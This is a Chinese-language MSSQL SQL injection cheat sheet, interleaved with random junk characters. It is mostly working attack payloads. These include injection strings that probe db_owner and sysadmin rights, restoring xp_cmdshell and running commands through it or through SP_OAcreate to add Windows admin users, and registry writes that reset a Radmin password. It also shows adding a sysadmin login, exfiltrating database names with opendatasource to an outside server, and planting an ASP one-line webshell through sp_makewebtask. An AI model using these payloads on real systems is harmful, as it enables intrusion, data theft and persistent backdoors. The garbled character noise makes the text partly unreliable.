//看看是什么权限的
6 P0 O6 {& ~, z8 s0 G9 z2 Dand 1=(Select IS_MEMBER('db_owner'))# a3 X% c: F" `* b
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
# H C' d; u) v" X' O' q
7 r3 y$ s1 i' n# Z3 z//检测是否有读取某数据库的权限: p) i+ ~% p* C: G# f: Q
and 1= (Select HAS_DBACCESS('master'))
- z3 G4 T% A/ j/ y0 F; `And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --" {* A' C- L0 B6 W0 p% R
& A# m7 v) V* @" y1 f7 L6 w
# d0 H, a& b1 f3 n; E数字类型# ]( u/ o3 G, `9 ]+ x
and char(124)%2Buser%2Bchar(124)=08 j1 S( Y1 g5 w, F7 W2 s! X
9 ^* F" l/ [! O5 x: ?' r2 h
字符类型' s3 l/ ]' U: |2 G+ D# w6 J; N3 j
' and char(124)%2Buser%2Bchar(124)=0 and ''='4 L) p4 p* P5 c" Y) L6 R
; w$ @/ ]2 ^+ D1 o" w! b& M
搜索类型, Y% v9 b) L; Q8 |2 _1 @' h' Q% ~
' and char(124)%2Buser%2Bchar(124)=0 and '%'='3 H/ f$ \' w4 A1 r y; f
2 s0 R1 g+ h- c, Y a& N, a爆用户名' j; Y. Z3 o% c' i+ g$ g+ {
and user>0# b6 T+ `% o& H
' and user>0 and ''='1 x. E. |- I$ n; o3 E* [! N2 C
; E' b, ]! b5 U1 e
检测是否为SA权限
; m) D p+ C2 y: Fand 1=(select IS_SRVROLEMEMBER('sysadmin'));--8 D. `* N1 ^1 ?
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
( S6 T/ w) H& K* \5 _' @5 [' r' q: \* h8 @1 W# t( }
检测是不是MSSQL数据库+ \3 x) X" k: I% ]8 X, p/ @7 i
and exists (select * from sysobjects);--
2 m& m; n, l( Y" x5 N+ h
- I6 Q/ U$ F$ J+ v9 e7 a! }检测是否支持多行' u0 l! R! J$ z
;declare @d int;--8 ?6 P$ l! n2 b, _9 c" m, t
( [. l) } {" r- U恢复 xp_cmdshell
% M; q2 F* s5 q2 D1 f8 L& j7 |# c;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--9 Y! C8 M6 _6 O+ V% C
& q3 N( R( Y/ M& B) ~
$ b% {8 p& @% E+ p3 Z2 a
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
" L& C( }6 \; V" G
$ W/ U. X6 @0 a/ _0 D y+ _" W//-----------------------
3 ?% C. M1 h7 B6 a// 执行命令5 j& H C9 U6 f- }
//-----------------------
# O: s7 x( g) [; ?4 ?. ^首先开启沙盘模式:
7 l6 Y" h' b$ ~exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
5 m7 ?2 e8 K r" A9 A/ M2 n: w# r' L5 o5 d3 ~3 b
然后利用jet.oledb执行系统命令
- ]% h5 J7 u; h$ ^/ {7 }& K: Tselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')5 i/ U, D" {9 ^' E2 R; o
2 v6 ^1 x' H! _7 W. a) m! L( G# {执行命令
+ D; Q. d' v1 Z& {8 \! J;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--1 U) s$ e H7 V8 m; J2 q/ u
1 g( E& e% n( y i9 d: \EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'( \, p$ p6 Q6 A8 F
" ^" I8 F5 F, N3 [; s判断xp_cmdshell扩展存储过程是否存在:0 o Y+ t y+ s& ]0 h+ t
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
* I" H8 L, i- }& ?, _5 I
/ \0 y5 h8 n. o6 u写注册表
% D! E4 N9 L2 d& Z" d. T4 ?exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1$ |8 \ }+ g4 S& H, W
9 K5 W% A. z1 H G. y
REG_SZ
6 ^: ]5 h6 E# S" L( p# |4 T2 I4 R: s! u5 Q. ]4 C
读注册表- `2 s& [7 m# v
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
. `; b% m e5 j! T( Z; ]. z7 f, r; Z/ C# g
读取目录内容4 F2 q0 r: M& r& B
exec master..xp_dirtree 'c:\winnt\system32\',1,1
8 y/ T; Q9 M5 ]" ` l, ~$ w& X* A3 u/ e9 W
& a l/ g* o& F m2 _. Z5 ^; Z, Q数据库备份
: I; f- R& [8 m! d1 _4 \! h9 _backup database pubs to disk = 'c:\123.bak'8 t" F$ c) r' P! z! E
% I5 B9 U' T' F! P( p" |2 ~" _; k
//爆出长度
2 d5 l+ {1 D- J' i2 SAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--, a: b# k% b% o+ o1 f$ Z
7 G( S, ^% m$ u2 f2 U3 c( }6 a1 T" ~4 @$ b9 T. {2 x
# G+ h! U2 B$ E7 u- w1 q4 y
更改sa口令方法:用sql综合利用工具连接后,执行命令:
' S/ O, w/ z! I' L6 K- c# u1 i; M; eexec sp_password NULL,'新密码','sa'
5 J# A/ I7 ]- K5 Y3 Y& Q
- @, d: B% R# T$ o0 U& T7 z/ D1 b4 x添加和删除一个SA权限的用户test:; @$ W0 ~- S! _; S& m o
exec master.dbo.sp_addlogin test,9530772, F/ u9 S! v/ M* \. }9 C
exec master.dbo.sp_addsrvrolemember test,sysadmin5 d+ M& p) L: Z8 w: v/ G3 |4 m+ C- X+ G
3 p. Z4 z: G" c# H9 v8 F, V删除扩展存储过过程xp_cmdshell的语句:
( X8 G8 a9 |9 \& t$ h. W+ qexec sp_dropextendedproc 'xp_cmdshell'
' b8 q$ W# a4 \3 ?3 w, k
( X! B' R2 @4 |) L/ T添加扩展存储过过程
: T0 G8 R q9 N: }# n0 f3 @. [EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
4 C& s! p% `+ S, _% TGRANT exec On xp_proxiedadata TO public5 @6 I8 k2 l/ g( k4 L; j8 g1 z
$ w R, N3 e" ]- ?' `9 e+ H4 L
- N d9 e3 ]" n停掉或激活某个服务。, e: Z1 \$ |- q: I* ?# b" L
4 V. U J- b+ ^+ a% E
exec master..xp_servicecontrol 'stop','schedule'
\! k$ S3 _1 t) I W" k0 }1 yexec master..xp_servicecontrol 'start','schedule'! Z- C& f, M( {$ \' J
. }7 h4 a- `7 N bdbo.xp_subdirs
; }! n4 ~5 a. `2 n
2 l; o2 b( X* o) H# j: p只列某个目录下的子目录。
1 S5 o6 i5 l8 b) G, c- yxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
& W& J2 R1 O4 @1 S. Z
/ V6 t2 v' d$ ? g, rdbo.xp_makecab- R( W0 o) Y: f8 P5 f9 Z' Q/ }
9 ?% Q O+ P8 n4 F将目标多个档案压缩到某个目标档案之内。
F0 J: N( N, R- o$ W; X/ |- w9 W所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
0 O9 W. M) D O& L6 }& O1 T; C8 W5 C
dbo.xp_makecab
6 p: e4 E! K$ {/ z& A8 o& x( ^0 k'c:\test.cab','mszip',1,
' a8 ^" [0 L$ Q6 J, t6 I'C:\Inetpub\wwwroot\SQLInject\login.asp',7 p8 c2 L+ u9 a+ a6 y" y! ^
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp' }/ }' S9 s& `2 y
$ R: U) ^( r7 n1 e# K. M
xp_terminate_process% b9 l T, C+ C( P4 \% o" }
/ w/ [3 F X; L) x# Z停掉某个执行中的程序,但赋予的参数是 Process ID。
; {8 W6 M# g: B' x利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
, {3 T) n5 T) L& O3 S' e& Y: ~' F; ^
xp_terminate_process 24849 F9 K$ m- i3 g5 e
: @- [9 ?- C* ~" i
xp_unpackcab
4 V7 ?' ~" w/ w9 G/ s! L# F6 S3 s2 X: C& t! Z
解开压缩档。
/ `2 t. s, z% w' J) u4 B: ]" ]
2 Y5 {* x/ e% b4 V8 E" D, y+ Gxp_unpackcab 'c:\test.cab','c:\temp',1
8 a2 a$ Z5 o$ D7 O$ g* ^' w/ o0 G W7 g7 `" D: g/ T
/ _4 z5 I ~0 E1 F4 ^5 {2 i某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234/ H' }- }- g( A! ~
1 @- H: X7 f4 y! ~4 g. T
create database lcx;
0 y/ u7 }2 V% e% X- PCreate TABLE ku(name nvarchar(256) null);
7 Y' g) \ M. B0 x4 q0 aCreate TABLE biao(id int NULL,name nvarchar(256) null);
' ^, S4 p P% d/ R4 ^( c2 a& T/ v
' a7 M/ p$ e6 i; ]3 R4 z T//得到数据库名/ ?+ ~* C. b9 c; t6 ]6 o9 y2 H
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
% L. l; X5 v% k0 r3 f1 h; C, l# D" _8 R) I. ]9 r
) @, d. w" v& _ `$ A |# X//在Master中创建表,看看权限怎样
: m5 i3 B, ~* U0 w6 qCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
* Y0 X9 B2 k, e9 m0 X4 ^. o. A" ?3 g2 p
用 sp_makewebtask直接在web目录里写入一句话马:
) c0 G% y5 i$ S7 N khttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
$ j2 n9 Q+ d. A/ i: f" | i3 v( F: |, v3 [- s6 I, \
//更新表内容7 C+ J7 I, P2 ]/ b3 B5 u% K
Update films SET kind = 'Dramatic' Where id = 123! L7 U9 g9 d% Y; i
/ ~& I5 D2 r; ]2 n! v' Q* a//删除内容
& q G0 k; U/ _/ T3 t, edelete from table_name where Stockid = 3 |